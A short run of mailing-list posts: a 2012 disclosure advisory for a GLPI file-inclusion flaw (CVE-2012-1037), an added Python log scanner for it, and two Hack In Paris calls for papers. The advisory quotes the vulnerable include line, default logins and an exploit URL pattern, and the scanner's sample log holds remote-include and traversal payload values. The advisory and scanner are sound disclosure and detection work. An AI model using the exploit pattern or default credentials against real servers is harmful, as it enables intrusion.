[Full-disclosure] CVE-2012-1037: GLPI <= 0.80.61 LFI/RFI
CVE-2012-1037: GLPI <= 0.80.61 LFI/RFI

Severity: Important

Vendor: GLPI - http://www.glpi-project.org

Versions Affected
=================
All versions between 0.78 and 0.80.61

Description
===========
GLPI fails to properly sanitize the GET 'sub_type' parameter in the front/popup.php file:

    [...]
    checkLoginUser();

    if (isset($_GET["popup"])) {
       $_SESSION["glpipopup"]["name"] = $_GET["popup"];
    }

    if (isset($_SESSION["glpipopup"]["name"])) {
       switch ($_SESSION["glpipopup"]["name"]) {
          [...]
          case "add_ruleparameter" :
             popHeader($LANG['ldap'][35], $_SERVER['PHP_SELF']);
             include strtolower($_GET['sub_type']."Parameter.php"); // <===
             break;
          [...]

To be triggered, the attacker needs to be authenticated. However, GLPI provides default accounts that often aren't changed or disabled:

    glpi/glpi
    tech/tech
    normal/normal
    post-only/postonly

Impact
======
Since there is a suffix, the vulnerability can be used as a RFI (requires allow_url_include = On). For LFI, the target file has to end up with "parameter.php". GLPI automatically escapes all GET and POST parameters with addslashes(), so the null byte technique is not usable. I have not tested exploitation using path truncation technique but it might be possible.

Mitigation
==========
Upgrade to GLPI 0.80.7.

Exploit
=======
http:///front/popup.php?popup=add_ruleparameter&sub_type=

Timeline
========
08 feb 2012 - Found the bug.
09 feb 2012 - Contacted the GLPI Team.
09 feb 2012 - Bug fixed & new version available.

Thanks to the GLPI team for being responsive!

References
==========
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1037
https://forge.indepnet.net/projects/glpi/versions/685
https://forge.indepnet.net/projects/glpi/repository/revisions/17457/diff/branches/0.80-bugfixes/front/popup.php

--
Emilien Girault

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
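A log check for the request pattern described in the advisory above, added here as an illustration; it is not part of the original post or of GLPI. The log lines, the /glpi/ install prefix and the value SampleRule are constructed, and the identifier pattern used as the expected shape of sub_type is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines: addresses, the /glpi/ prefix and SampleRule are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Feb/2012:10:00:01 +0000] "GET /glpi/front/popup.php?popup=add_ruleparameter&sub_type=SampleRule HTTP/1.1" 200 512',
    '192.0.2.77 - - [10/Feb/2012:10:02:13 +0000] "GET /glpi/front/popup.php?popup=add_ruleparameter&sub_type=http%3A%2F%2Fexample.invalid%2Fa HTTP/1.1" 200 40',
    '192.0.2.77 - - [10/Feb/2012:10:02:20 +0000] "GET /glpi/front/popup.php?sub_type=..%2F..%2Ffiles%2Fx HTTP/1.1" 200 40',
    '192.0.2.10 - - [10/Feb/2012:10:03:00 +0000] "GET /glpi/front/central.php HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate sub_type is a bare class-style identifier.
SAFE_SUB_TYPE = re.compile(r'^[A-Za-z][A-Za-z0-9_]*$')


def classify_sub_type(value):
    """Label a decoded sub_type value by how it would change the include path."""
    if SAFE_SUB_TYPE.match(value):
        return "ok"
    if "://" in value:
        return "remote"      # URL wrapper: the RFI case (needs allow_url_include = On)
    if "/" in value or "\\" in value or ".." in value:
        return "traversal"   # path component: the LFI case
    return "unexpected"


def include_target(value):
    """Mirror strtolower($_GET['sub_type']."Parameter.php") from front/popup.php."""
    return (value + "Parameter.php").lower()


def scan(lines):
    """Return (line_no, verdict, include_target) for suspicious popup.php requests."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/front/popup.php"):
            continue
        # popup.php keeps the popup name in the session, so a request does not
        # have to carry popup= itself; inspect every sub_type on this script.
        for value in parse_qs(url.query, keep_blank_values=True).get("sub_type", []):
            verdict = classify_sub_type(value)
            if verdict != "ok":
                findings.append((line_no, verdict, include_target(value)))
    return findings
```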
[Full-disclosure] Hack In Paris 2011 Call For Papers Reminder
Hello FD!

This is just a reminder that the Call for Papers for Hack In Paris 2011 is closing on 30th of March. We've received some very nice submissions so far.

Hack In Paris will take place in Disneyland Paris Conference Center and will be split into two parts:

* June 14-15: Trainings
* June 16-17: Talks

Please do not hesitate to submit! Your submission should contain the following elements:

* The biography of each author
* A short description (abstract) of your presentation
* The summary of your research, including technical information; in particular novel research with regards to the state of the art
* An estimation of your expenses (trip and hotel)

Please send your proposal to cfp[at]hackinparis[dot]com.

Contact & Social Media
======================
Contact:  info[at]hackinparis[dot]com
Website:  http://www.hackinparis.com/
Twitter:  http://twitter.com/hackinparis
Facebook: http://www.facebook.com/pages/Hack-In-Paris/134611446603792
Linkedin: http://www.linkedin.com/groups?gid=3750882

--
the HIP team
[Full-disclosure] Hack In Paris 2011 Call For Papers
Hack In Paris 2011
http://www.hackinparis.com/
Call For Papers

Introduction
============
Since 2004, Sysdream and HZV have organized the "Nuit du Hack" (Hacker's Night) event in Paris, France. After the success of last year with more than 600 attendees, we are planning a more international and corporate event. Aiming to bring together security professionals and enthusiasts, Hack In Paris will focus on the latest advances in IT security.

The conference will be held at Disney's Conference Centre in Disneyland Paris from June 16th to 17th of 2011. This place is easily accessible by train (15mn ride) from downtown Paris and airports.

Topics
======
The following list contains major topics the conference will cover. Please consider submitting even if the subject of your research is not listed here.

* Advances in reverse engineering
* Vulnerability research and exploitation
* Penetration testing and security assessment
* Malware analysis and new trends in malicious codes
* Forensics, IT crime & law enforcement
* Privacy issues: LOPPSI, HADOPI, ...
* Low-level hacking (console security & mobile devices)
* Risk management and ISO 27001

How to submit?
==============
Submissions should contain the following elements:

* The biography of each author
* A short description (abstract) of your presentation
* The summary of your research, including technical information; in particular novel research with regards to the state of the art
* An estimation of your expenses (trip and hotel)

Please send your proposal to cfp[at]hackinparis[dot]com.

Note: presentations will take about 45 minutes, including 5 to 10 minutes of questions.

All submissions will be reviewed by our program committee. Authors will be notified upon acceptance of their talk.

Upcoming dates
==============
January 20   CFP announced
April 31     Submission deadline
May 15       Notification sent to authors
May 17       Program announcement
June 16-17   Hack In Paris
June 18      Nuit du Hack

Trainings
=========
We are also looking for experienced professionals to give one or two-day trainings.
Contact trainings[at]hackinparis[dot]com.

Contact & Social Media
======================
Contact:  info[at]hackinparis[dot]com
Twitter:  http://twitter.com/hackinparis
Facebook: http://www.facebook.com/pages/Hack-In-Paris/134611446603792
Linkedin: http://www.linkedin.com/groups?gid=3750882

Thank you very much, and we hope to see you soon in Paris!

--
the HIP team